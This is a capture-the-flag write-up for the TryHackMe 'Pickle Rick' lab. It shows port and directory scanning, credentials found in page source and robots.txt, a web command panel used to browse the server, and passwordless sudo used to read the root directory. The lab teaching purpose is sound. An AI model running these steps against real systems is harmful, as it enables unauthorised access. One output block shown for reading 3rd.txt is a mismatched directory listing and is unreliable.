Pickle Rick Write-up: THM Capture The Flag

A Fun TryHackMe Machine

Pickle Rick Write-up: THM Capture The Flag

About the machine: This Rick and Morty-themed challenge requires you to exploit a web server and find three ingredients to help Rick make his potion and transform himself back into a human from a pickle.

Let's start by using Nmap to look for open ports. We can see that the HTTP port is open, as well as the Apache version. We can also see that SSH is running:

nmap -AF 10.10.63.170

RESULT:
PORT       SERVICE   VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let us see if we can find out more about the machine by using Whatweb:

whatweb 10.10.63.170                  
http://10.10.63.170 [200 OK] Apache[2.4.18], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.63.170], JQuery, Script, Title[Rick is sup4r cool]

Seems like Whatweb gave us the same information. The server is running on Ubuntu and uses Apache 2.4.18. Additionally, the title of the website is "Rick is sup4r cool".

After visiting the website and checking its source code, we can discover Rick's username "RickRul3s" which he commented out on purpose so that he won't forget.

We can try using Dirbuster to discover files and directories on the website. With Dirbuster, we can see that there is a /login.php and a /portal.php. The latter redirects us to the former and now we know where to enter the username that we found earlier, "RickRul3s".

Let's also try dirb maybe we can get some more files or directories:

==> DIRECTORY: http://10.10.63.170/assets/
+ http://10.10.63.170/index.html (CODE:200|SIZE:1062)                      
+ http://10.10.63.170/robots.txt (CODE:200|SIZE:17)                        
+ http://10.10.63.170/server-status (CODE:403|SIZE:300)

Interestingly a robots.txt file exists. If we try to check it out, it contains Rick's favorite catchphrase "Wubbalubbadubdub". Could this be Rick's password? Let's try using this as his password.

We are now greeted with the following page:

We can see that there is a command panel, and the rest of the tabs redirect us to /denied.php which says "Only the real Rick can access this".

After running ls -al in the command panel we can see the following files and directories:

total 40
drwxr-xr-x 3 root   root   4096 Feb 10  2019 .
drwxr-xr-x 3 root   root   4096 Feb 10  2019 ..
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4096 Feb 10  2019 assets
-rwxr-xr-x 1 ubuntu ubuntu   54 Feb 10  2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1105 Feb 10  2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10  2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10  2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2044 Feb 10  2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu   17 Feb 10  2019 robots.txt

We can try to use the cat but it is disabled, however, we can read the files by inserting them in the URL:

Alternatively, we can also read the files using the strings <file> command.

We now have the first ingredient "mr. meeseek hair".

To find the second ingredient we can run strings clue.txt which hints that we should "Look around the file system for the other ingredients."

After snooping around the file system, we can find the second ingredient, which is located in the home/rick directory.

ls -la ../../../home/rick
drwxrwxrwx 2 root root 4096 Feb 10  2019 .
drwxr-xr-x 4 root root 4096 Feb 10  2019 ..
-rwxrwxrwx 1 root root   13 Feb 10  2019 second ingredients

We can then display it using strings ../../../home/rick/second \ingredients. The second ingredient is "1 jerry tear".

In the filesystem we can try to check the root directory, however, it will not display anything, which could mean that we don't have permission to access it.

Surprisingly, when running sudo it will not ask for a password. The following are the contents of the root directory:

sudo ls -la ../../../root
drwx------  4 root root 4096 Feb 10  2019 .
drwxr-xr-x 23 root root 4096 May  8 09:15 ..
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Feb 10  2019 .ssh
-rw-r--r--  1 root root   29 Feb 10  2019 3rd.txt
drwxr-xr-x  3 root root 4096 Feb 10  2019 snap

It appears that the last ingredient can be found within the third file named "3rd.txt".

sudo strings ../../../root/3rd.txt
drwxr-xr-x  4 root   root   4096 Feb 10  2019 .
drwxr-xr-x 23 root   root   4096 May  8 10:46 ..
drwxrwxrwx  2 root   root   4096 Feb 10  2019 rick
drwxr-xr-x  4 ubuntu ubuntu 4096 Feb 10  2019 ubuntu

Running sudo strings ../../../root/3rd.txt gives us the final ingredient "fleeb juice"

Now Pickle Rick can transform back into a human.

Season 3 GIF by Rick and Morty